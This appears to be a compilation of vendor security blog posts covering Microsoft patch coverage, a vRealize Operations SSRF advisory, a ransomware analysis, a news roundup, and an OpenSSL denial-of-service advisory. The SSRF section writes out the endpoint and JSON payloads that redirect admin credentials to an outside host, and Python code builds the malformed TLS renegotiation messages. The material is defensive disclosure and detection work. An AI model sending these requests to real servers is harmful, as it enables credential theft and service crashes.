Posts

Microsoft Security Bulletin Coverage for April 2021

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2021. A list of the issues reported, along with SonicWall coverage information, is as follows:

CVE-2021-28310 Win32k Elevation of Privilege Vulnerability
ASPY 173 Malformed-File exe.MP.175

CVE-2021-28324 Windows SMB Information Disclosure Vulnerability
ASPY 175 Malformed-File exe.MP.178

CVE-2021-28325 Windows SMB Information Disclosure Vulnerability
ASPY 176 Malformed-File exe.MP.179

CVE-2021-28442 Windows TCP/IP Information Disclosure Vulnerability
ASPY 174 Malformed-File exe.MP.177

The following vulnerabilities do not have known exploits in the wild:

CVE-2021-26413 Windows Installer Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26415 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26416 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26417 Windows Overlay Filter Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27064 Visual Studio Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27067 Azure DevOps Server and Team Foundation Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27072 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27079 Windows Media Photo Codec Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27086 Windows Services and Controller App Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27088 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27089 Microsoft Internet Messaging API Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27090 Windows Secure Kernel Mode Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27091 RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27092 Azure AD Web Sign-in Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27093 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27094 Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27095 Windows Media Video Decoder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27096 NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28309 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28311 Windows Application Compatibility Cache Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28312 Windows NTFS Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28313 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28314 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28315 Windows Media Video Decoder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28316 Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28317 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28318 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28319 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28320 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28321 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28322 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28323 Windows DNS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28326 Windows AppX Deployment Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28327 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28328 Windows DNS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28329 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28330 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28331 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28332 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28333 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28334 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28335 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28336 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28337 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28346 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28347 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28348 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28349 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28350 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28351 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28352 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28356 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28357 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28434 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28435 Windows Event Tracing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28436 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28437 Windows Installer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28438 Windows Console Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28439 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28440 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28441 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28443 Windows Console Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28444 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28445 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28446 Windows Portmapping Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28447 Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28448 Visual Studio Code Kubernetes Tools Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28449 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28450 Microsoft SharePoint Denial of Service Update
There are no known exploits in the wild.
CVE-2021-28451 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28452 Microsoft Outlook Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2021-28453 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28454 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28456 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28457 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28458 Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28459 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-28460 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28464 VP9 Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28466 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28468 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28469 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28470 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28471 Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28472 Visual Studio Code Maven for Java Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28473 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28475 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28477 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28480 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28481 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28482 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28483 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.

SSRF, vRealize Operations Manager API

Overview:

  VMware vRealize Operations Manager delivers intelligent operations management with application-to-storage visibility across physical, virtual, and cloud infrastructures. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF) vulnerability in the vRealize Operations Manager API. The vulnerability was privately reported to VMware. Patches and workarounds are available to address the vulnerability in the impacted VMware products listed below. VMware has evaluated this issue to be of ‘Important’ severity with a maximum CVSSv3 base score of 8.6.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-21975.

Common Vulnerability Scoring System (CVSS):

  CVSSv2 Base 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C):
    • Access vector is NETWORK
    • Access complexity is LOW
    • Level of authentication required is NONE
    • Impact of this vulnerability on data confidentiality is COMPLETE
    • Impact of this vulnerability on data integrity is COMPLETE
    • Impact of this vulnerability on data availability is COMPLETE
  CVSSv2 Temporal 7.8 (E:POC/RL:OF/RC:C):
    • The exploitability level of this vulnerability is PROOF OF CONCEPT
    • The remediation level of this vulnerability is OFFICIAL FIX
    • The report confidence level of this vulnerability is CONFIRMED
  Note that the vector above is CVSSv2; VMware’s own CVSSv3 base score for this issue is 8.6.

Attack Behavior & Chain Reaction:

  Performs a Server Side Request Forgery attack to steal administrative credentials.

Triggering the Vulnerability:

  One of the REST API URIs vRealize Operations Manager supports is "/casa/nodes/thumbprints", which is accessible without authentication because of the following entry in the casa-security-context.xml file:
  <sec:http pattern="/nodes/thumbprints" security="none"/>

  On the server side, a function called getNodesThumbprints() handles requests for this URI. The HTTP payload of the request is an address array in JSON format, such as:
  ["127.0.0.1:443"]

  The vulnerability is due to a lack of sanitization of the incoming HTTP request. When the server receives an HTTP POST request for the URI "/casa/nodes/thumbprints", the vulnerable function getNodesThumbprints() reads the address array from the request body and sends an HTTP request for the URI "/casa/node/thumbprint" to each of those addresses.

  If an address value in the array contains a URI path, "/casa/node/thumbprint" is appended to that path. For example, if the following HTTP payload is sent:
  ["test.com:443/test/"]

  then getNodesThumbprints() requests the URI "/test/casa/node/thumbprint" from test.com:443. The attacker therefore controls the destination host and port and a path prefix, but not the full URI of the forged request. Note that in versions before vRealize Operations Manager 8.3, the server sends the credentials of the "maintenanceAdmin" account in the Authorization header of this outbound request, so a request pointed at an attacker-controlled host discloses them.

  A remote attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in the theft of administrative credentials on some versions of VMware vRealize Operations Manager.

Affected products:

  vRealize Operations Manager
  • 7.0.0
  • 7.5.0
  • 8.0.0, 8.0.1
  • 8.1.0, 8.1.1
  • 8.2.0
  • 8.3.0
  VMware Cloud Foundation (vROps)
  • 3.x
  • 4.x
  vRealize Suite Lifecycle Manager (vROps)
  • 8.x

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 15487 VMware vRealize Operations Manager API SSRF

Remediation Details:

  • The file /usr/lib/vmware-casa/casa-webapp/logs/casa.log is of particular interest for tracking suspicious requests.
  • KB83210
  • KB83095
  • KB83094
  • KB83093
  • KB82367
  • KB83287

Appendix – Discovered By:

  Egor Dimitrenko of Positive Technologies reported this vulnerability.

Uniwinnicrypt ransomware charges over $550k for file recovery

The SonicWall Capture Labs threat research team has been tracking a ransomware family named Uniwinnicrypt. This malware is aimed at large corporations, and the operators demand over $550k USD in cryptocurrency (Monero or Bitcoin) for file recovery. The operators provide a custom chat site hosted on the Tor network for negotiating with their victims. However, conversations between victims and the operators are publicly accessible.

Infection cycle:

Upon infection, code is injected into grpconv.exe, iexpress.exe or write.exe. This injected code performs the encryption of files on the system.

The extension “.uniwinnicrypt” is appended to all encrypted files.

HOW_FIX_FILES.htm is dropped into every directory where files were encrypted. It contains the ransom note, which includes a Tor link.

The Tor link leads to the operators’ chat site.

After entering the requested information, an existing conversation between another victim (not us) and the operator can be seen.

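A triage sweep for the indicators described above, as an added example rather than SonicWall tooling: it walks a file tree for the .uniwinnicrypt suffix and HOW_FIX_FILES.htm notes, recovers the original file names, flags directories that were encrypted but did not receive a note, and tags process image names matching the injection hosts. The sample directory tree is constructed inside the script and is not real victim data.

```python
"""Triage sweep for the Uniwinnicrypt indicators in the write-up above.

Added example, not SonicWall tooling. Indicators taken from the write-up:
".uniwinnicrypt" appended to encrypted files, HOW_FIX_FILES.htm dropped in
every affected directory, and code injected into grpconv.exe, iexpress.exe
or write.exe. The sample directory tree below is constructed for the demo.
"""
from __future__ import annotations

import os
import tempfile
from pathlib import Path

ENCRYPTED_SUFFIX = ".uniwinnicrypt"
RANSOM_NOTE = "HOW_FIX_FILES.htm"
INJECTION_HOSTS = {"grpconv.exe", "iexpress.exe", "write.exe"}


def sweep(root: str | os.PathLike) -> dict[str, list[Path]]:
    """Walk root and report encrypted files, ransom notes, the original names
    (suffix stripped, for matching against backups) and directories that hold
    encrypted files but no note, which points at an interrupted run."""
    encrypted: list[Path] = []
    notes: list[Path] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath, name)
            if name.lower().endswith(ENCRYPTED_SUFFIX):
                encrypted.append(path)
            elif name.lower() == RANSOM_NOTE.lower():
                notes.append(path)
    hit_dirs = {p.parent for p in encrypted}
    note_dirs = {p.parent for p in notes}
    return {
        "encrypted_files": sorted(encrypted),
        "ransom_notes": sorted(notes),
        "original_names": sorted(
            p.with_name(p.name[: -len(ENCRYPTED_SUFFIX)]) for p in encrypted
        ),
        "dirs_missing_note": sorted(hit_dirs - note_dirs),
    }


def is_injection_host(image_path: str) -> bool:
    """True for the benign Windows binaries named as injection targets; a
    process list filtered with this is where to look for the running
    encryptor. Accepts Windows or POSIX separators."""
    image_name = image_path.replace("\\", "/").rsplit("/", 1)[-1]
    return image_name.lower() in INJECTION_HOSTS


def build_sample_tree(base: Path) -> Path:
    """Constructed sample data, not real victim files: one fully processed
    directory, one encrypted without a note, and one untouched."""
    docs, partial, clean = base / "docs", base / "partial", base / "clean"
    for d in (docs, partial, clean):
        d.mkdir(parents=True)
    (docs / ("budget.xlsx" + ENCRYPTED_SUFFIX)).write_bytes(b"\x00" * 16)
    (docs / RANSOM_NOTE).write_text("<html>ransom note placeholder</html>")
    (partial / ("notes.txt" + ENCRYPTED_SUFFIX)).write_bytes(b"\x00" * 16)
    (clean / "readme.txt").write_text("untouched")
    return base


def demo() -> dict[str, list[str]]:
    """Run the sweep over the constructed tree; paths relative to its root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(Path(tmp) / "share")
        report = sweep(root)
        return {
            key: [p.relative_to(root).as_posix() for p in paths]
            for key, paths in report.items()
        }


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

Point sweep() at a file share or a mounted victim image; the "dirs_missing_note" list is worth checking first, since it marks where encryption was interrupted and partially recoverable data may remain.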
SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Uniwinnicrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 04-09-21

This week, educational institutions around the world found themselves the target of malware, as lawmakers faced pressure to increase protection for schools and universities.


SonicWall in the News

Keeping Tabs on IoT Security — Enterprise IT News

  • SonicWall Vice President of Regional Sales (APAC) Debasish Mukherjee was interviewed on the recent 2021 Cyber Threat Report.

Logically Buys MSSP Company, Sets Sights on $100M — TechTarget: SearchITChannel

  • This article mentions SonicWall’s strategic alliance with MSSP company Cerdant.

Industry News

European Institutions Were Targeted in a Cyberattack Last Week — Bloomberg

  • A spokesperson for the commission said that a number of EU bodies “experienced an IT security incident in their IT infrastructure.”

China Creates Its Own Digital Currency, a First for Major Economy — The Wall Street Journal

  • A cyber yuan stands to give Beijing power to track spending in real time. It also could soften the bite of U.S. sanctions.

US DoD Launches Vuln Disclosure Program for Contractor Networks — Security Week

  • The U.S. Department of Defense announced the launch of a new vulnerability disclosure program to identify vulnerabilities in Defense Industrial Base contractor networks.

Ransomware Hits TU Dublin and National College of Ireland — Bleeping Computer

  • The National College of Ireland is working on restoring IT services after being hit by a ransomware attack that forced the college to take IT systems offline.

FBI, CISA Warn Fortinet FortiOS Vulnerabilities Are Being Actively Exploited — ZDNet

  • APT groups are suspected of harnessing three bugs, two critical, for data exfiltration purposes.

University of California Victim of Ransomware Attack — The Hill

  • The university said in a statement that it — along with several other government agencies, private companies and other schools — has been involved in an attack involving Accellion, a secure file transfer company.

Malicious Cheats for Call of Duty: Warzone Are Circulating Online — Ars Technica

  • Activision said that a popular cheating site was circulating a fake cheat for “Call of Duty: Warzone” that contained a dropper, a type of backdoor that installs specific pieces of malware.

Malware Attack is Preventing Car Inspections in Eight U.S. States — Bleeping Computer

  • A malware attack on emissions testing company Applus Technologies is preventing vehicle inspections in Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah and Wisconsin.

As Ransomware Stalks the Manufacturing Sector, Victims Are Still Keeping Quiet — Cyberscoop

  • While competition from companies with cheap labor has long been an economic concern for U.S. manufacturers, cyberattacks have crept gradually into the equation.

Lawmakers Urge Education Department to Take Action to Defend Schools from Cyber Threats — The Washington Times

  • Representatives urged the Department of Education to prioritize protecting K-12 institutions from cyberattacks, which have shot up in the past year as classes moved increasingly online.

Feds Say Man Broke Into Public Water System and Shut Down Safety Processes — Ars Technica

  • The indictment underscores the potential for remote intrusions to have fatal consequences.

Ransomware Gang Wanted $40 Million in Florida Schools Cyberattack — Bleeping Computer

  • Fueled by large payments from victims, ransomware gangs have started to demand ridiculous ransoms from organizations that cannot afford them.

U.S. DOJ: Phishing Attacks Use Vaccine Surveys to Steal Personal Info — Bleeping Computer

  • The U.S. Department of Justice warned of phishing attacks using fake post-vaccine surveys to steal money or trick people into handing over their personal information.

March 2021 OpenSSL Vulnerability

Overview:

  A denial of service vulnerability has been reported in the OpenSSL library. An OpenSSL TLS server may crash if a remote client sends a maliciously crafted renegotiation ClientHello message. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello) but includes a signature_algorithms_cert extension, a NULL pointer dereference results, crashing the server process. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions before 1.1.1k are affected; OpenSSL 1.0.2 is not impacted.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-3449, dated 2021-03-17.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are cryptographic protocols that provide a secure channel between two communicating peers, giving authentication, confidentiality and data integrity for communication over TCP/IP networks. They combine symmetric key ciphers for bulk encryption, cryptographically secure hash functions for integrity, and asymmetric (public-key) cryptography, which uses a pair of related keys, one public and one private, to authenticate the peers and establish the shared session keys. These protocols enable hosts to communicate securely over insecure networks.

Triggering the Problem:

  • The target must have a vulnerable version of the product running, with TLS 1.2 enabled.
  • The target application must have TLS renegotiation enabled.
  • The attacker must have network connectivity to the vulnerable application.

Triggering Conditions:

  The attacker sends a TLS 1.2 ClientHello containing a non-empty signature_algorithms extension and completes the handshake, then initiates renegotiation with a ClientHello that omits the signature_algorithms extension but includes a non-empty signature_algorithms_cert extension. The vulnerability is triggered when the server processes this renegotiation ClientHello.
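
To show the exchange concretely, the following added example (not OpenSSL code and not SonicWall signature logic) builds minimal TLS 1.2 ClientHello records, parses their extensions, and applies the advisory's condition to an initial/renegotiation pair. The cipher suite, the random bytes and the SignatureScheme values used are arbitrary choices for the example.

```python
"""Build and inspect TLS 1.2 ClientHello records to recognise the
CVE-2021-3449 trigger described above.

Added example, not OpenSSL code or SonicWall signature logic. The builder
emits a minimal ClientHello (random bytes, one cipher suite, no session ID)
so both halves of the exchange can be shown offline.
"""
import os
import struct

TLS12 = 0x0303
HANDSHAKE = 0x16
CLIENT_HELLO = 0x01
EXT_SIGNATURE_ALGORITHMS = 0x000D       # signature_algorithms (13)
EXT_SIGNATURE_ALGORITHMS_CERT = 0x0032  # signature_algorithms_cert (50)


def sigalg_list(schemes):
    """Body of a signature_algorithms(_cert) extension: u16 length + u16 codes."""
    body = b"".join(struct.pack("!H", s) for s in schemes)
    return struct.pack("!H", len(body)) + body


def build_client_hello(extensions, cipher_suites=(0xC02F,), version=TLS12):
    """Return one TLS record carrying a ClientHello with the given
    (extension_type, extension_body) pairs."""
    ext_blob = b"".join(struct.pack("!HH", t, len(b)) + b for t, b in extensions)
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (
        struct.pack("!H", version)
        + os.urandom(32)                              # client random
        + b"\x00"                                     # empty session_id
        + struct.pack("!H", len(suites)) + suites
        + b"\x01\x00"                                 # compression: null only
        + struct.pack("!H", len(ext_blob)) + ext_blob
    )
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + struct.pack("!HH", TLS12, len(handshake)) + handshake


def parse_client_hello(record):
    """Parse a single-record ClientHello; returns the client version and an
    {extension_type: body} map. Raises ValueError on anything else."""
    if len(record) < 5 or record[0] != HANDSHAKE:
        raise ValueError("not a TLS handshake record")
    (rec_len,) = struct.unpack("!H", record[3:5])
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    (version,) = struct.unpack("!H", body[0:2])
    pos = 2 + 32                                      # skip client random
    pos += 1 + body[pos]                              # session_id
    (cs_len,) = struct.unpack("!H", body[pos:pos + 2])
    pos += 2 + cs_len                                 # cipher suites
    pos += 1 + body[pos]                              # compression methods
    extensions = {}
    if pos < len(body):
        (ext_len,) = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            ext_type, length = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            extensions[ext_type] = body[pos:pos + length]
            pos += length
    return {"version": version, "extensions": extensions}


def is_cve_2021_3449_trigger(initial_record, renegotiation_record):
    """The advisory's condition: both hellos are TLS 1.2, the initial one
    carried signature_algorithms, and the renegotiation one drops it while
    presenting signature_algorithms_cert."""
    first = parse_client_hello(initial_record)
    second = parse_client_hello(renegotiation_record)
    if first["version"] != TLS12 or second["version"] != TLS12:
        return False
    return (
        EXT_SIGNATURE_ALGORITHMS in first["extensions"]
        and EXT_SIGNATURE_ALGORITHMS not in second["extensions"]
        and EXT_SIGNATURE_ALGORITHMS_CERT in second["extensions"]
    )


if __name__ == "__main__":
    first = build_client_hello([(EXT_SIGNATURE_ALGORITHMS, sigalg_list([0x0403, 0x0804]))])
    renego = build_client_hello([(EXT_SIGNATURE_ALGORITHMS_CERT, sigalg_list([0x0403]))])
    print("trigger:", is_cve_2021_3449_trigger(first, renego))   # True
    print("trigger:", is_cve_2021_3449_trigger(first, first))    # False
```

Detection on the wire needs the same pairing: remember whether the first ClientHello on a connection carried signature_algorithms, then evaluate any later ClientHello seen on the same connection. TLS 1.3 ClientHellos also carry 0x0303 in the legacy version field and are told apart by the supported_versions extension, which this minimal parser does not consult; the advisory's condition concerns TLS 1.2 renegotiation only.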

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • TLS
    • HTTPS, over ports 443/TCP, 8443/TCP
    • SMTP, over ports 25/TCP, 587/TCP

Patched Software:

  • OpenSSL 1.1.1k

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 15483 “Client Renegotiation within Short Period”

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading to the patched release (OpenSSL 1.1.1k) to eliminate the vulnerability.
    • Disabling TLS 1.2 in OpenSSL.
    • Disabling renegotiation if it is not needed.
  The vendor has released the following advisory regarding this vulnerability:
  OpenSSL Security Advisory [25 March 2021]
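
Checking a deployment against the three remediations above, as an added example that uses Python's ssl module as the configuration surface for an OpenSSL-backed server (it is not OpenSSL project code): the linked library version is compared with 1.1.1k, and a weak server context is built beside a hardened one so the difference is visible.

```python
"""Check a TLS server configuration against the CVE-2021-3449 remediations.

Added example, not OpenSSL project code: Python's ssl module is used as the
configuration surface for an OpenSSL-backed server. Vulnerable 1.1.1
releases are those before 1.1.1k; the weak and hardened contexts are built
side by side.
"""
import ssl

FIXED_PATCH_LEVEL = 11  # 1.1.1k: OpenSSL patch letters a..k map to 1..11


def library_vulnerable(version_info=ssl.OPENSSL_VERSION_INFO) -> bool:
    """True for any OpenSSL 1.1.1 release before 1.1.1k. Other branches
    (1.0.2, 3.x) do not carry the bug. version_info is the ssl module's
    (major, minor, fix, patch, status) tuple."""
    major, minor, fix, patch = version_info[:4]
    return (major, minor, fix) == (1, 1, 1) and patch < FIXED_PATCH_LEVEL


def server_context(disable_renegotiation=True, tls13_only=False) -> ssl.SSLContext:
    """Server context with the chosen mitigations. Calling it with both flags
    False models the configuration the advisory calls vulnerable: TLS 1.2
    negotiable and renegotiation allowed."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    if disable_renegotiation:
        ctx.options |= ssl.OP_NO_RENEGOTIATION       # refuse all renegotiation
    else:
        ctx.options = int(ctx.options) & ~int(ssl.OP_NO_RENEGOTIATION)
    if tls13_only:
        ctx.minimum_version = ssl.TLSVersion.TLSv1_3  # TLS 1.2 never negotiated
    return ctx


def allows_tls12(ctx: ssl.SSLContext) -> bool:
    """TLS 1.2 is negotiable when it lies within [minimum, maximum]. The
    MINIMUM/MAXIMUM_SUPPORTED sentinels are not ordered like real versions,
    so they are handled explicitly."""
    lo, hi = ctx.minimum_version, ctx.maximum_version
    above_floor = lo == ssl.TLSVersion.MINIMUM_SUPPORTED or lo <= ssl.TLSVersion.TLSv1_2
    below_ceiling = hi == ssl.TLSVersion.MAXIMUM_SUPPORTED or hi >= ssl.TLSVersion.TLSv1_2
    return above_floor and below_ceiling


def exposes_cve_2021_3449(ctx: ssl.SSLContext, version_info=ssl.OPENSSL_VERSION_INFO) -> bool:
    """Exposed only if the library is unpatched AND TLS 1.2 is negotiable AND
    renegotiation is allowed; removing any one of the three is enough."""
    renegotiation_allowed = not (ctx.options & ssl.OP_NO_RENEGOTIATION)
    return library_vulnerable(version_info) and allows_tls12(ctx) and renegotiation_allowed


if __name__ == "__main__":
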